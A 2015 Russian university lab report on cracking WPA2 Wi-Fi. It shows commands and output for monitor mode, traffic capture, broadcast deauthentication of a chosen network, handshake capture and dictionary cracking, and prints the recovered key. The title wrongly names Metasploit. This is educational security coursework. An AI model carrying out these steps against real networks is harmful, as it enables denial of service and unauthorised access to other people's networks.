

САНКТ-ПЕТЕРБУРГСКИЙ ГОСУДАРСТВЕННЫЙ
ПОЛИТЕХНИЧЕСКИЙ УНИВЕРСИТЕТ
Кафедра Компьютерных Систем и Программных Технологий

ОТЧЕТ

по лабораторной работе №5

Тема: «Инструмент тестов на проникновение Metasploit»

Дисциплина: «Методы и средства защиты информации»

Выполнил: студент гр. 53501/2
Пономарев М.А.

Преподаватель
Вылегжанина К.Д.

Санкт-Петербург
2015

Содержание

1	Задание	2
2	Выполнение	3
2.1	Изучение	3
2.1.1	Изучить документацию по основным утилитам пакета — airmon-ng, airodump-ng, aircrack-ng	3
2.1.2	Запустить режим мониторинга на беспроводном интерфейсе	3
2.1.3	Запустить утилиту airodump, изучить формат вывода этой утилиты	4
2.2	Практическое задание	5
2.2.1	Запустить режим мониторинга на беспроводном интерфейсе	5
2.2.2	Сбор трафика	5
2.2.3	Произведем деаутентификацию	6
2.2.4	Подбор пароля с помощью словаря	7
3	Выводы	9

1 Задание

— Изучение

- а) Изучить документацию по основным утилитам пакета — `airmon-ng`, `airodump-ng`, `aireplay-ng`, `aircrack-ng`.
- б) Запустить режим мониторинга на беспроводном интерфейсе
- в) Запустить утилиту `airodump`, изучить формат вывода этой утилиты, форматы файлов, которые она может создавать

— Практическое задание

- а) Запустить режим мониторинга на беспроводном интерфейсе
- б) Запустить сбор трафика для получения аутентификационных сообщений
- в) Если аутентификаций в сети не происходит в разумный промежуток времени, произвести деаутентификацию одного из клиентов, до тех пор, пока не удастся собрать необходимых для взлома аутентификационных сообщений
- г) Произвести взлом используя словарь паролей

2 Выполнение

2.1 Изучение

2.1.1 Изучить документацию по основным утилитам пакета — `airmon-ng`, `airodump-ng`, `aireplay-ng`, `aircrack-ng`

а) `Airodump-ng` — программа предназначенная для захвата сырых пакетов протокола 802.11 с последующим их использованием в `aircrack-ng`. Если к вашему компьютеру подсоединен GPS навигатор то `airodump-ng` способен отмечать координаты точек на картах

б) `Aireplay-ng` - Основная функция программы заключается в генерации трафика для последующего использования в `aircrack-ng` для взлома WEP и WPA-PSK ключей

в) `Aircrack-ng` — Взламывает ключи WEP и WPA (Перебор по словарю)

2.1.2 Запустить режим мониторинга на беспроводном интерфейсе

```
root@kali:~# airmon-ng start wlan0
```

```
Found 3 processes that could cause trouble.
```

```
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
```

```
-e
```

```
PID   Name
```

```
2212  NetworkManager
```

```
2707  dhclient
```

```
3178  wpa_supplicant
```

```
Interface Chipset   Driver
```

```
wlan0    Unknown  rtl8192cu - [phy0]
```

```
(monitor mode enabled on mon1)
```

```
mon0     Unknown  rtl8192cu - [phy0]
```

Ввод команды `airmon-ng` без параметров покажет статус интерфейсов.

Использование:

```
airmon-ng <start|stop> <interface> [channel]
```

```
airmon-ng <check|check kill>
```

Где:

— `<start|stop>` — запустить/отключить интерфейс

— `<interface>` — определяет интерфейс

channel — выбор канала

— <check|check kill> — check покажет все процессы, мешающие Aircrack-ng, а после убить их

2.1.3 Запустить утилиту airodump, изучить формат вывода этой утилиты

Запустив интерфейс в режим мониторинга посмотрим, какой трафик у нас идет в сети. Для этого используем Airodump-ng.

```
root@kali:~# airodump-ng mon0
```

```
CH 10 ][ Elapsed: 3 mins ][ 2015-06-08 09:46
```

BSSID	PWR	Beacons	#Data, #/s	CH	MB	ENC	CIPHER	AUTH	ESSID
BC:85:56:66:40:8A	-47	389	3	0	11	54e.	WPA2	CCMP	PSK nastr
00:1F:C6:2A:04:40	-61	311	19	0	11	54	WPA	TKIP	PSK 303
00:21:91:0A:1C:BD	-66	323	11	0	1	54e.	WPA2	CCMP	PSK digit
00:18:F3:EF:DE:B5	-77	382	0	0	11	54	WPA2	TKIP	PSK KSPT3
00:1F:C6:42:3F:C1	-97	786	52	0	6	54	WPA2	CCMP	PSK Lab20
B8:A3:86:5B:CB:8C	-82	737	60	0	6	54e	WPA2	CCMP	PSK <leng
40:01:C6:CE:C7:C0	-67	423	388	11	8	54	.	WPA2	TKIP PSK KSPT
90:F6:52:75:D0:AE	-97	86	1	0	1	54e	OPN		Mikc-
00:1E:58:B8:AA:E7	-97	71	5	0	4	54	.	WPA2	CCMP PSK eda-1
C0:4A:00:86:1D:84	-97	15	0	0	6	54e.	WPA2	CCMP	PSK sport
24:A4:3C:48:0A:6E	-93	8	0	0	11	54e.	WPA2	CCMP	PSK <leng
00:1F:33:24:1A:90	-97	3	0	0	6	54e.	OPN		DCN .

u

BSSID	STATION	PWR	Rate	Lost	Frames	Probe
(not associated)	C4:6E:1F:25:4E:9C	0	0 - 1	0	55	
(not associated)	BC:85:56:66:40:89	-47	0 - 1	0	40	
(not associated)	C4:85:08:7C:C6:A3	-49	0 - 1	0	45	nastroisam.

airodump-ng - используется для перехвата пакетов исходящих от 802.11 и особенно подходит для сбора WEP IVs для намерением использовать их с Aircrack-ng. Кроме того, Aircrack-ng записывает несколько файлов, содержащих информацию обо всех точках доступа и клиентах в зоне видимости.

2.2 Практическое задание

2.2.1 Запустить режим мониторинга на беспроводном интерфейсе

```
root@kali:~# airmon-ng start wlan0
```

Found 3 processes that could cause trouble.

If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to **kill** (some of) them!

-e

PID	Name
2192	dhclient
2196	NetworkManager
3091	wpa_supplicant

Interface	Chipset	Driver
-----------	---------	--------

wlan0	Unknown	rtl8192cu - [phy0] (monitor mode enabled on mon0)
-------	---------	--

2.2.2 Сбор трафика

Команда airodump-ng позволяет захватить весь физически доступный трафик и распознать имена сетей, каналов, точек доступа и клиентов.

```
airodump-ng mon2
```

BSSID	PWR	Beacons	#Data, #/s	CH	MB	ENC
CIPHER AUTH ESSID						
1C:7E:E5:39:26:F8	-42	162	246	29	4	54e. WPA2
CCMP	PSK	18	7C:03:D8:98:4A:5C	-44	1	0 0
11 54e	WPA	CCMP	PSK ROSTE	10:9A:DD:86:FE:15	-65	2
0 0 11	54e. WPA2	CCMP	PSK z46ne	70:62:B8:89:DD:FC	-70	
2	0	0 10	54e WPA2	CCMP	PSK WPlus	E0:CB:
4E:D2:D9:B9	-71	2	0 0 11	54	WEP	WEP
ALTIN						
08:60:6E:BC:2E:00	-72	1	0	0 11	54e	WPA2 CCMP PSK home
D4:21:22:17:25:08	-73	2	0	0 7	54e	WPA2 CCMP PSK Sidor
60:A4:4C:D0:DD:BC	-74	134	45	0 6	54e	WPA2 CCMP PSK ASUS
00:26:5A:A0:84:84	-78	17	0	0 6	54e.	WPA2 CCMP PSK leabe

```
10:9A:DD:86:FE:16 -81      1      0      0 149 54e WPA2 CCMP PSK z46ne
```

Рисунок 1 — Взлом по ip с помощью утилиты armitage

Выберем в качестве целевой сеть с BSSID 1C:7E:E5:39:26:F8. Теперь можно запустить airodump-ng с параметрами отслеживания именно этой сети. Параметр `-write` обеспечивает запись трафика в файл с префиксом `dump`.

```
airodump-ng mon2 --write airdump --bssid 1C:7E:E5:39:26:F8 -c 4
```

```
CH 4 ][ BAT: 1 hour 12 mins ][ Elapsed: 12 s ][ 2015-06-03 20:41 ][ fixed
channel mon2: -1
```

BSSID	PWR	RXQ	Beacons	#Data,	#/s	CH	MB	ENC	CIPHER	AUTH	ESSID
1C:7E:E5:39:26:F8	-83	100	137	380	58	4	54e.	WPA2	CCMP	PSK	18

BSSID	STATION	PWR	Rate	Lost	Packets	Probes
1C:7E:E5:39:26:F8	C0:18:85:9E:54:0B	0	0e- 1e	0	3	
1C:7E:E5:39:26:F8	28:9A:FA:42:18:65	18	0e- 1	1	4	
1C:7E:E5:39:26:F8	74:E5:43:65:15:F5	-127	0e- 0e	0	374	

2.2.3 Произведем деаутентификацию

```
aireplay-ng --ignore-negative-one --deauth 150
-a 1C:7E:E5:39:26:F8 -h 7C:03:D8:98:4A:5C mon0
The interface MAC (C0:18:85:9E:54:0B) doesn't match the specified MAC (-h).
  ifconfig mon0 hw ether 7C:03:D8:98:4A:5C
21:27:51 Waiting for beacon frame (BSSID: 1C:7E:E5:39:26:F8) on channel -1
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
21:27:51 Sending DeAuth to broadcast -- BSSID: [1C:7E:E5:39:26:F8]
21:27:52 Sending DeAuth to broadcast -- BSSID: [1C:7E:E5:39:26:F8]
21:27:52 Sending DeAuth to broadcast -- BSSID: [1C:7E:E5:39:26:F8]
21:27:53 Sending DeAuth to broadcast -- BSSID: [1C:7E:E5:39:26:F8]
21:27:53 Sending DeAuth to broadcast -- BSSID: [1C:7E:E5:39:26:F8]
```

В результате словим пакет handshake:

```
airodump-ng mon0 --bssid 1C:7E:E5:39:26:F8 -c 6
```

```
--write dump --ignore-negative-one
```

```
CH 6 ][ Elapsed: 1 min ][ 2015-06-03 21:30 ][ WPA handshake: 1C:7E:E5:39:26:F
```

BSSID	PWR	RXQ	Beacons	#Data,	#/s	CH	MB	ENC	CIPHER	AUTH	E
-------	-----	-----	---------	--------	-----	----	----	-----	--------	------	---

1C:7E:E5:39:26:F8	-47	100	880	791	4	4	54e.	WPA2	CCMP	PSK	11
-------------------	-----	-----	-----	-----	---	---	------	------	------	-----	----

BSSID	STATION	PWR	Rate	Lost	Packets	Probes
-------	---------	-----	------	------	---------	--------

1C:7E:E5:39:26:F8	74:E5:43:65:15:F5	-32	0e- 1	0	645	18
-------------------	-------------------	-----	-------	---	-----	----

2.2.4 Подбор пароля с помощью словаря

```
aircrack-ng dump-05.cap -w English.dic
```

```
Opening dump-05.cap
```

```
Read 20931 packets.
```

#	BSSID	ESSID	Encryption
1	1C:7E:E5:39:26:F8	18	WPA (1 handshake)

```
Choosing first network as target.
```

```
Opening dump-05.cap
```

```
Reading packets, please wait...
```

```
Aircrack-ng 1.1
```

```
[00:01:51] 91444 keys tested (845.44 k/s)
```

```
KEY FOUND! [ excombat112 ]
```

```
Master Key : CB A9 50 ED 43 34 9F 6E C1 CD 22 48 71 3C 21 F3
             7D 11 CE BF 37 E0 B4 62 CE 4B EC 03 32 DB 47 B1
```

```
Transient Key : 9B 6F B4 1A E5 6C E0 96 13 BD CB 53 47 F5 E6 AE
                74 18 DC B4 6B 74 CE AF CD 52 B1 E8 A3 00 73 B8
                43 D3 84 3B C2 74 7C 4E BE 74 3B A5 80 5D 4F 92
```


25 8C 45 86 45 97 1A 41 E6 58 18 9E 94 FE 1C BB

EAPOL HMAC : 23 38 A3 41 34 98 88 00 4C 73 54 67 39 E9 DB 87

3 Выводы

В ходе данной работы были изучены основные возможности пакеты Air Crack и принципы взлома WPA/WPA2 PSK. Данный инструмент позволяет прослушивать пакеты, генерировать новые и на основе handshake осуществлять взлом пароля сети. Следует отметить, что пароли, отвечающие требованиям не представляется возможным взломать, так как единственный возможный вариант — это перебор паролей. Таким образом, нельзя сказать, что протокол WPA уязвим на данный момент. С другой стороны, гораздо большей проблемой является возможность деаутентифицировать пользователя любой сети. Данная возможность открывает возможность атаки с целью отказа в обслуживании.

В общем случае, следует отметить, что защита беспроводных сетей непостоянная задача и в качестве меры для базового обеспечения безопасности не следует использовать протокол WEP и простые пароли.